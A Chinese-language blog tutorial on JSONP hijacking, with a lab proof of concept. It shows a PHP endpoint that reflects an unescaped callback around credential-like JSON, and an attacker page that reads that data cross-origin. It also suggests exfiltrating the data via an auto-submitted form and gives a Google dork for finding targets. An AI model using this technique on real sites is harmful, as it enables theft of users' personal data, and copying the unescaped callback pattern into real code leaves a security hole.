JSONP劫持

最新推荐文章于 2024-08-02 16:40:33 发布
最新推荐文章于 2024-08-02 16:40:33 发布
阅读量436 收藏
点赞数
分类专栏: 渗透原理篇 文章标签: json web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/129459645
版权

注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

个人博客地址:HJW个人博客

扩展:

面试问题:CSRF的两种方法中,CORS和JSONP的区别?

主要区别就是 JSONP 只能发起 get 请求,而 CORS 可以发起任何请求

接下来我们来介绍JSONP。

JSONP劫持原理:

首先我们提前了解下JSONPJSONP 教程 | 菜鸟教程

JSONP出现是为了解决还没有出现同源策略而出现的,是使用<script src=''></script>来实现的当然还可以使用其他的方法。

简单的说就是利用<script>标签来拿到A用户在其他网站的信息(json)。

JSONP劫持演示:

index.php        部署到服务器        192.168.131.131:8084

<?php
if(isset($_GET['callback']))
{
	$callback = $_GET['callback'];
	print $callback.'({"username" : "testadmin", "pasd" : "thisisadminpassword"});';
} else 
{
	echo 'No callback param.';
}
?>

index.html        部署到服务器         192.168.131.131:8999

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>JSONP</title>
</head>
<body>
    <div id="here"></div>
    <script type="text/javascript">
    function callbackFunction(result)
    {
        var html = '<ul>';
        html += '<li>' + 'username: ' + result.username + '</li>';
        html += '<li>' + 'password: ' +result.password + '</li>';
        html += '</ul>';
        document.getElementById('here').innerHTML = html;
    }
    </script>
    <script type="text/javascript" src="http://192.168.131.131:8084/index.php?callback=callbackFunction"></script>
</body>
</html>

?callback=callbackFunction        这里的 callback = 函数名要与html中的函数名对应。从而使callbackFuncation拿到json数据。

这里当然可以调用.js文件。

恶意网站

ey.html        本机        192.168.131.1:1122

<html>
<head>
<title>jsonp</title>
<meta charset="utf-8">
<script type="text/javascript">
function evail(json){
    a = JSON.stringify(json);
    console.log(a)
}
</script>
</head>
<body>
<script type="text/javascript" src="http://192.168.131.131:8084/index.php?callback=evail"></script>
</body>
</html>

测试结果:

 这里可以写个自动提交表单,然后传到php文件,将敏感信息进行保存。

JSONP的危害

造成用户信息泄露,如邮箱,姓名,手机等信息,通过这些信息可以进一步实施诈骗行为。

JSONP的挖掘

进入调试器中进行寻找,搜索callbcak/bk,都是不一定的。毕竟这个名字是自己调用的。

谷歌进行搜索:inurl:.json

使用工具

参考文章:

浅谈CSRF跨域读取型漏洞之JSONP劫持_coleak的博客-CSDN博客

JSONP挖掘与高级利用 | WooYun知识库

不习惯有你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JSONP 劫持
weixin_38885346的博客
05-02 384
一、什么是JSONP JSONPJson in Paddig) 第一、在网络中为了传输数据与读取数据有统一的格式,所以使用json结构来重构数据,简单点就是键值对; 第二、由于同源策略,所以不同域的网站无法通过AJAX直接读取数据,比如一个银行,有两个不同域的网站,一个网站可以以json格式显示用户信息,银行希望另一个网站能够读取到这些信息; 第三、虽然不能跨域请求,但是能跨域脚本包含 基于此,JSONP诞生了,其实JSONP的实现原理就是JSONP劫持的实现原理,用个靶场举例: 二、实现原理 目标网
详解JSONJSONP劫持以及解决方法
10-17
JSONJSONP劫持是网络攻击中常见的两种技术手段,它们能够窃取通过Web服务传输的敏感数据。在这篇文章中,将详细介绍JSONJSONP劫持的原理、攻击方式以及有效的解决方法。 首先,了解JSON劫持,也就是JSON ...
jsonp劫持
m0_51553670的博客
07-29 1531
JSON指的是JavaScript对象表示法( JavaScript Object Notation)JSON是轻量级的文本数据交换格式JSON是存储和交换文本信息的语法,类似XML但JSON比XML更小、更快、更易解析C、Python、C++、Java、PHP、Go等编程语言都支持JSON几乎所有编程语言都有解析JSON的库,而在JavaScript中,我们可以直接使用JSON,因为JavaScript内置了JSON的解析。
Jsonp劫持
Sentiment的博客
07-25 885
我们知道,在JSONP跨域中,我们是可以传入一个函数名的参数如callback,然后JSONP端点会根据我们的传参动态生成JSONP数据响应回来。如果JSONP端点对于用于传入的函数名参数callback处理不当,如未正确设置响应包的Content-Type、未对用户输入参数进行有效过滤或转义时,就会导致XSS漏洞的产生。jsonp.php} else {请求后触发xss,此时发现php默认的content-type为text/html。
详解JSONJSONP劫持以及解决方法.docx
01-22
"详解JSONJSONP劫持以及解决方法" 本文主要介绍了JSONJSONP劫持的概念、攻击过程、解决方法以及实例代码,旨在帮助读者深入理解这两种攻击方式,并提供实际有效的解决方法。 JSON劫持 JSON劫持,也称为JSON ...
使用jsonp实现跨域获取数据实例讲解
10-20
JSONP的使用场景比较有限,它仅支持GET请求,并且存在安全风险,比如可能会受到JSONP劫持攻击。因此,现代的跨域解决方案,如CORS(跨源资源共享)已经成为了更加安全和强大的方法。不过,了解和掌握JSONP的工作原理...
详解JSON劫持技术_数据劫持
12-12
详解JSON劫持技术 了解JSON劫持技术的不多,包括json劫持,JSONP劫持,以及如何防御JSON劫持JSONP劫持
Web安全JSONP劫持
不忘初心,护天下安全!
02-10 583
一、JSONP为何物 JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 <script></script> 元素标签,远程调用 JSON 文件来实现数据传递。 细致的介绍可以看这:https://blog.csdn.net/hansexploration/arti...
jsonp劫持攻击
goddemon
03-10 409
前言: 对这个漏洞一直是知道是什么东西,但是一直不太懂这个漏洞该咋挖和咋进阶利用 今天上课的时候查漏补缺研究了下这个东西做了一个总结 漏洞原理: 核心利用的原理:JSONP技术可以实现数据的跨域访问,进而攻击者利用该漏洞可以向用户发送一个伪造的链接,进而当用户点击后进行回调函数进而即窃取到用户的信息 典型可以跨域的标签 < script src = "..." > </script> <img src="..."> <video src="..."><
web前端安全性——JSONP劫持
qq_53911056的博客
02-22 1312
JSONP劫持的防护 (1)限制referer 前端可以通过设置document.referrer属性来限制Referer。虽然这并不能阻止攻击者伪造Referer,但可以增加一层防护。 (2)使用token 在前端,你可以通过添加一个自定义的token参数来增强JSONP请求的安全性。
浅谈CSRF跨域读取型漏洞之JSONP劫持
记录学习,一起进步
03-06 857
CSRF跨域读取型漏洞之JSONP劫持
分享一个jsonp劫持造成的新浪某社区CSRF蠕虫
Coisini的博客
06-15 445
最近jsonp很火,实话说已经是被玩烂了的,只是一直没有受到大家的重视。正好在上个月,我挖过一个由于jsonp造成的新浪某社区CSRF,当时是为了准备一篇文章,之后这篇文章也会拿出来分享。 因为新浪已经修复了问题,所以我先把这个漏洞分享出来。以下是当时写的部分文章。 0x01 引子 听说新浪五月送衣服,我其实也没太多空去挖洞。本来想交一个两年前挖的CSRF刷粉,结果拿出来一看那洞早没了,目标站都...
CORS配置漏洞/jsonp劫持
最新发布
weixin_71093833的博客
08-02 1011
cors漏洞简单摘要
从 Ajax 聊一聊 Jsonp 点击劫持
hl1293348082的专栏
03-27 68
偶然看到 freebuf 去年的一篇文章,JSONP 注入解析 http://www.freebuf.com/articles/web/126347.html 看完整篇文章并没有太理解其提到的 JSONP,仔细查阅了相关资料,在这里将所得与大家分享~ 从 Ajax 谈起 1.先提两个众所周知的概念: 1、Ajax,Asynchronous JavaScript and XML,意思就是用 JavaScript 执行异步网络请求。 2、Web 的运作原理:一次 HTTP 请求对应一个页面。
Jsonp劫持学习
Y4tacker的博客
03-29 455
Author:Y4tacker Last_Updated_Time:2021/3/29 文章目录Jsonp劫持学习什么是Jsonp实验 Jsonp劫持学习 什么是Jsonp 感觉菜鸟教程和https://www.bejson.com/knownjson/aboutjsonp/写的差不多,我这种菜鸟都能懂 实验 劫持原理网上这张图很形象 首先我们准备一个jsonp.php,简单的写了一个 <?php header('Content-type: application/json'); $jsonca.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值